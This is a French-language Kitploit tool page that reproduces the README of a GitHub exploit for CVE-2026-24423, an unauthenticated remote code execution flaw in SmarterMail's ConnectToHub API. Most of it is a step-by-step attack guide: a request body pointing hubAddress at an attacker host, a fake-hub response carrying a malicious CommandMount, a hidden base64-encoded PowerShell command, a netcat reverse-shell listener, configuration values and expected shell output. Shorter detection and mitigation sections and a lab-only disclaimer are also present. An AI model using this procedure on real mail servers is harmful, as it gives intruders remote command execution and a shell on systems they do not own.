Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
SmarterMail-CVE-2026-24423- — Exploit pour CVE-2026-24423 — une RCE critique non authentifiée dans l'API ConnectToHub de SmarterMail. Concerne toutes les versions antérieures à 9511. | Kitploit
Outils/GitHubGitHub/cyberalp0/smartermail-cve-2026-24423-
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingOutil d'Accès à Distance
GitHubcyberalp0/smartermail-cve-2026-24423-

SmarterMail-CVE-2026-24423-

Exploit pour CVE-2026-24423 — une RCE critique non authentifiée dans l'API ConnectToHub de SmarterMail. Concerne toutes les versions antérieures à 9511.

Voir le dépôt
il y a 14h 52mPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

SmarterMail ConnectToHub RCE

Un exploit basé sur Python pour CVE-2026-24423, une vulnérabilité d'exécution de code à distance non authentifiée dans la fonctionnalité ConnectToHub de SmarterTools SmarterMail.

Utilisation prévue : Tests de sécurité autorisés, CTF, laboratoires Hack The Box et environnements de recherche contrôlés uniquement.


Table des matières

  • Vue d'ensemble
  • Détails de la CVE
  • Versions affectées
  • Description de la vulnérabilité
  • Détails techniques
  • Déroulement de l'exploitation
  • Prérequis
  • Configuration
  • Utilisation
  • Sortie attendue
  • Dépannage
  • Captures d'écran
  • Structure du projet
  • Atténuation
  • Références
  • Avertissement

Vue d'ensemble

CVE-2026-24423 est une vulnérabilité d'exécution de code à distance non authentifiée affectant SmarterTools SmarterMail.

La vulnérabilité existe dans la fonctionnalité ConnectToHub. Un attaquant non authentifié peut fournir une hubAddress malveillante, ce qui amène le serveur SmarterMail à effectuer une requête HTTP vers un serveur contrôlé par l'attaquant.

Le serveur malveillant répond avec une réponse setup-initial-connection conçue contenant une valeur SystemMount.CommandMount contrôlée.

L'instance SmarterMail vulnérable traite ensuite cette valeur comme une commande du système d'exploitation, permettant l'exécution arbitraire de commandes dans le contexte de sécurité du service SmarterMail.

La vulnérabilité a reçu un score CVSS 4.0 de 9,3 (Critique) et est classée comme CWE-306 : Absence d'authentification pour une fonction critique.


Détails de la CVE

ChampValeur
CVECVE-2026-24423
ÉditeurSmarterTools
ProduitSmarterMail
VulnérabilitéExécution de code à distance non authentifiée
CWECWE-306
CVSS v4.09,3 Critique
CVSS v3.19,8 Critique
Vecteur d'attaqueRéseau
AuthentificationAucune
Interaction utilisateurAucune
ComplexitéFaible
Publiée23 janvier 2026
Build corrigé9511

L'enregistrement officiel de la CVE décrit le problème comme une RCE non authentifiée via la méthode API ConnectToHub.


Versions affectées

Les versions de SmarterMail antérieures au Build 9511 sont affectées.

L'enregistrement de la CVE spécifie la plage affectée comme suit :

root@kitploit:~
SmarterMail < 100.0.9511

Le build 9511, publié le 15 janvier 2026, contient le correctif de l'éditeur.

Vulnérables

root@kitploit:~
< 100.0.9511

Corrigées

root@kitploit:~
>= 100.0.9511

Vérifiez toujours le build installé exact avant de tenter de reproduire la vulnérabilité.


Description de la vulnérabilité

La fonctionnalité vulnérable est exposée via l'API d'administration système de SmarterMail.

L'opération concernée est :

root@kitploit:~
/api/v1/settings/sysadmin/connect-to-hub

Le point de terminaison accepte un paramètre hubAddress.

Conceptuellement, un attaquant peut fournir :

root@kitploit:~
{
    "hubAddress": "http://ATTACKER_IP:8081",
    "oneTimePassword": "temporary-value",
    "nodeName": "DC"
}

SmarterMail se connecte ensuite à l'adresse du hub fournie et demande :

root@kitploit:~
/web/api/node-management/setup-initial-connection

Le serveur contrôlé par l'attaquant répond avec du JSON contenant un objet SystemMount malveillant.

La propriété importante est :

root@kitploit:~
"SystemMount": {
    "Enabled": true,
    "ReadOnly": false,
    "MountPath": "...",
    "CommandMount": "..."
}

La valeur CommandMount est ensuite utilisée par l'application vulnérable comme commande du système d'exploitation.

Cela permet à un attaquant de passer de :

root@kitploit:~
Requête HTTP non authentifiée

à :

root@kitploit:~
Exécution de commande à distance

L'analyse technique de VulnCheck confirme que la hubAddress contrôlée par l'attaquant amène SmarterMail à demander le point de terminaison setup-initial-connection de l'attaquant et que le CommandMount renvoyé peut fournir une exécution arbitraire de commandes.


Détails techniques

L'exploit se compose de deux éléments :

1. Faux hub SmarterMail

Le serveur Python écoute sur :

root@kitploit:~
POST /web/api/node-management/setup-initial-connection

et renvoie une réponse JSON conçue contenant le SystemMount.CommandMount malveillant.

2. Écouteur de shell inversé

Un écouteur TCP séparé reçoit la connexion initiée par la commande exécutée sur la cible.

Cet exploit utilise intentionnellement deux ports séparés.

root@kitploit:~
8081
└── Faux hub SmarterMail

4455
└── Écouteur de shell inversé

Déroulement de l'exploitation

root@kitploit:~
flowchart LR

    A[Attaquant<br/>10.10.14.50]

    H[Faux hub SmarterMail<br/>TCP/8081]

    T[Cible SmarterMail<br/>10.129.57.86]

    C[CommandMount<br/>Exécution de commande]

    P[PowerShell]

    L[Écouteur de shell inversé<br/>TCP/4455]

    A -->|Déclencher ConnectToHub| T
    T -->|HTTP POST| H
    H -->|JSON malveillant| T
    T -->|CommandMount| C
    C --> P
    P -->|TCP inversé| L
    L --> A

Connexion 1 — Faux hub

root@kitploit:~
Cible
   |
   | HTTP
   v
10.10.14.50:8081

Connexion 2 — Shell inversé

root@kitploit:~
Cible
   |
   | TCP
   v
10.10.14.50:4455

Ces ports servent à des fins différentes et ne doivent pas être confondus.


Prérequis

  • Python 3
  • Machine d'attaque Linux
  • VPN Hack The Box ou réseau autorisé équivalent
  • Connectivité réseau de la cible vers l'attaquant
  • Netcat
  • Installation SmarterMail vulnérable

L'exploit utilise uniquement des modules de la bibliothèque standard de Python :

root@kitploit:~
http.server
json
base64

Aucun paquet Python externe n'est requis.


Configuration

Modifiez les variables suivantes :

root@kitploit:~
LHOST = "10.10.14.50"
LPORT = 4455
HUB_PORT = 8081

Pour l'environnement HTB d'exemple :

root@kitploit:~
LHOST     = 10.10.14.50
LPORT     = 4455
HUB_PORT  = 8081

LHOST

LHOST est l'adresse IP de l'attaquant que la cible peut atteindre.

Pour Hack The Box, il s'agit normalement de l'IP assignée à l'interface VPN HTB :

root@kitploit:~
ip addr show tun0

Exemple :

root@kitploit:~
tun0:
    inet 10.10.14.50

Par conséquent :

root@kitploit:~
LHOST = "10.10.14.50"

LPORT

LPORT est le port TCP utilisé par l'attaquant pour recevoir la connexion inversée.

Exemple :

root@kitploit:~
LPORT = 4455

HUB_PORT

HUB_PORT est le port HTTP utilisé par le hub SmarterMail malveillant.

Exemple :

root@kitploit:~
HUB_PORT = 8081

Utilisation

1. Cloner le dépôt

root@kitploit:~
git clone https://github.com/<username>/<repository>.git
cd <repository>

2. Configurer l'exploit

Modifiez :

root@kitploit:~
nano exploit.py

Définissez :

root@kitploit:~
LHOST = "10.10.14.50"
LPORT = 4455
HUB_PORT = 8081

3. Démarrer l'écouteur de shell inversé

Ouvrez un terminal :

root@kitploit:~
nc -lvnp 4455

Résultat attendu :

root@kitploit:~
Listening on 0.0.0.0 4455

Laissez ce terminal ouvert.


4. Démarrer le hub malveillant

Ouvrez un second terminal :

root@kitploit:~
python3 exploit.py

Si la liaison au port sélectionné nécessite des privilèges élevés :

root@kitploit:~
sudo python3 exploit.py

Sortie attendue :

root@kitploit:~
============================================================
 SmarterMail fake hub
============================================================
[+] LHOST:      10.10.14.50
[+] LPORT:      4455
[+] HUB:        10.10.14.50:8081

[+] Waiting for SmarterMail...
============================================================

5. Déclencher ConnectToHub

Envoyez la requête appropriée à l'instance SmarterMail vulnérable.

La hubAddress fournie doit pointer vers le serveur HTTP malveillant :

root@kitploit:~
{
    "hubAddress": "http://10.10.14.50:8081",
    "oneTimePassword": "tempst",
    "nodeName": "DC"
}

La valeur importante est :

root@kitploit:~
http://10.10.14.50:8081

N'utilisez pas le port du shell inversé comme port du hub.


Résumé de la configuration des ports

ObjectifIPPort
VPN de l'attaquant10.10.14.50—
Faux hub SmarterMail10.10.14.508081
Shell inversé10.10.14.504455
Cible HTB10.129.57.86—

Le flux résultant est :

root@kitploit:~
hubAddress
    ↓
10.10.14.50:8081
    ↓
CommandMount malveillant
    ↓
PowerShell
    ↓
10.10.14.50:4455

Encodage de la charge utile

L'exploit crée dynamiquement la charge utile PowerShell.

Le paramètre -EncodedCommand de PowerShell attend que la commande soit encodée en UTF-16LE avant l'encodage Base64.

Le script effectue :

root@kitploit:~
encoded = base64.b64encode(
    PS.encode("utf-16le")
).decode()

La commande finale est structurée comme suit :

root@kitploit:~
powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -EncodedCommand <BASE64>

Cela évite l'encodage manuel de la charge utile et prévient les erreurs courantes d'encodage UTF-8/UTF-16LE.


Sortie attendue

Lorsque la cible atteint le hub malveillant :

root@kitploit:~
[+] Received SmarterMail connection
[+] Path: /web/api/node-management/setup-initial-connection
[+] Body: ...
[+] Sending CommandMount payload
[+] Reverse shell -> 10.10.14.50:4455

L'écouteur de shell inversé devrait ensuite recevoir une connexion :

root@kitploit:~
Connection received on 10.129.57.86 XXXXX

Une fois connecté, une validation de base peut être effectuée :

root@kitploit:~
whoami
root@kitploit:~
hostname

Dépannage

Le faux hub ne reçoit aucune connexion

Vérifiez que le serveur écoute :

root@kitploit:~
ss -lntp | grep 8081

Vérifiez l'adresse VPN :

root@kitploit:~
ip addr show tun0

Confirmez que LHOST correspond à l'adresse accessible depuis la cible.


Le faux hub reçoit HTTP 200 mais aucun shell

Une requête HTTP réussie signifie que la première étape fonctionne :

root@kitploit:~
Cible
  |
  | HTTP
  v
Faux hub :8081

Cela ne signifie pas nécessairement que la deuxième étape a réussi.

Vérifiez :

root@kitploit:~
ss -lntp | grep 4455

Assurez-vous que Netcat a été démarré avant de déclencher l'exploit.

Vérifiez également :

root@kitploit:~
LHOST = IP de l'attaquant accessible depuis la cible
LPORT = port de l'écouteur

Netcat reçoit la requête HTTP au lieu d'un shell

Si vous voyez :

root@kitploit:~
POST /web/api/node-management/setup-initial-connection

dans Netcat, vous avez pointé hubAddress vers l'écouteur de shell inversé.

Incorrect :

root@kitploit:~
hubAddress = http://10.10.14.50:4455

Correct :

root@kitploit:~
hubAddress = http://10.10.14.50:8081

Les deux ports doivent rester séparés.


Réponse HTTP 400

Une réponse 400 peut se produire lorsque le faux hub ne renvoie pas la structure attendue par SmarterMail.

Vérifiez que la réponse contient :

root@kitploit:~
"SystemMount": {
    "Enabled": true,
    "ReadOnly": false,
    "MountPath": "...",
    "CommandMount": "..."
}

Assurez-vous également que le chemin demandé est exactement :

root@kitploit:~
/web/api/node-management/setup-initial-connection

L'analyse publique de la vulnérabilité identifie ce point de terminaison comme faisant partie du flux ConnectToHub vulnérable.


Captures d'écran

Ajoutez ici les captures d'écran du laboratoire HTB.

1. Énumération de la cible

Exemple :

root@kitploit:~
![Nmap Enumeration](https://raw.githubusercontent.com/cyberalp0/smartermail-cve-2026-24423-/HEAD/screenshots/nmap.png)

Capture suggérée :

  • Résultats Nmap
  • Service/version SmarterMail
  • Port exposé pertinent

2. Hub malveillant

root@kitploit:~
![Fake Hub](https://raw.githubusercontent.com/cyberalp0/smartermail-cve-2026-24423-/HEAD/screenshots/fake-hub.png)

Montrez :

root@kitploit:~
[+] Received SmarterMail connection
[+] Sending CommandMount payload

3. Déclenchement de l'exploit

root@kitploit:~
![Burp Request](https://raw.githubusercontent.com/cyberalp0/smartermail-cve-2026-24423-/HEAD/screenshots/burp-request.png)

Montrez la requête contenant :

root@kitploit:~
{
    "hubAddress": "http://10.10.14.50:8081"
}

4. Shell inversé

root@kitploit:~
![Reverse Shell](https://raw.githubusercontent.com/cyberalp0/smartermail-cve-2026-24423-/HEAD/screenshots/reverse-shell.png)

Montrez :

root@kitploit:~
Connection received on 10.129.57.86

et l'invite de commande résultante.


Structure du projet

root@kitploit:~
smartermail-rce/
│
├── exploit.py
├── README.md
│
└── screenshots/
    ├── nmap.png
    ├── burp-request.png
    ├── fake-hub.png
    └── reverse-shell.png

Détection

Les indicateurs potentiels d'exploitation incluent des requêtes inattendues vers :

root@kitploit:~
/api/v1/settings/sysadmin/connect-to-hub

et des connexions sortantes du serveur SmarterMail vers des hôtes HTTP précédemment inconnus.

Les administrateurs doivent également examiner les journaux d'application, de proxy inverse/IIS et réseau pour toute activité ConnectToHub suspecte.

CVE-2026-24423 a été incluse dans le catalogue des vulnérabilités connues exploitées de la CISA, indiquant que l'exploitation a été observée en dehors des environnements de laboratoire.


Atténuation

La principale mesure corrective consiste à mettre à niveau SmarterMail vers le Build 9511 ou ultérieur. La version du 15 janvier 2026 de l'éditeur a corrigé la vulnérabilité.

Lorsqu'un correctif immédiat n'est pas possible, les organisations devraient également envisager :

  • Restreindre l'accès aux API administratives de SmarterMail.
  • Empêcher tout accès externe inutile aux points de terminaison de gestion.
  • Appliquer une segmentation du réseau.
  • Surveiller les connexions sortantes du serveur SmarterMail.
  • Examiner les journaux historiques pour détecter les requêtes ConnectToHub suspectes.
  • Enquêter sur toute exécution de commande inattendue par le compte de service SmarterMail.

Références

  • Enregistrement CVE : CVE-2026-24423
  • VulnCheck : SmarterMail ConnectToHub RCE non authentifiée
  • CODE WHITE : Liste publique des vulnérabilités
  • Notes de version SmarterTools SmarterMail
  • Catalogue des vulnérabilités connues exploitées de la CISA

Avertissement

Ce projet est fourni uniquement à des fins de recherche en sécurité autorisée et d'éducation.

N'utilisez pas cet exploit contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation explicite de tester.

L'auteur décline toute responsabilité en cas d'utilisation abusive, de dommages, de perte de données, d'accès non autorisé ou d'autres conséquences résultant de l'utilisation de ce logiciel.

Utilisez uniquement dans des environnements contrôlés tels que :

  • Hack The Box
  • Compétitions Capture-the-Flag
  • Laboratoires personnels
  • Tests d'intrusion autorisés
  • Environnements de recherche en sécurité

Crédits

CVE-2026-24423 a été créditée à :

  • Sina Kheirkhah
  • Piotr Bazydlo
  • Markus Wulftange
  • Cale Black

La CVE a été publiée par VulnCheck le 23 janvier 2026.

Télécharger l’outil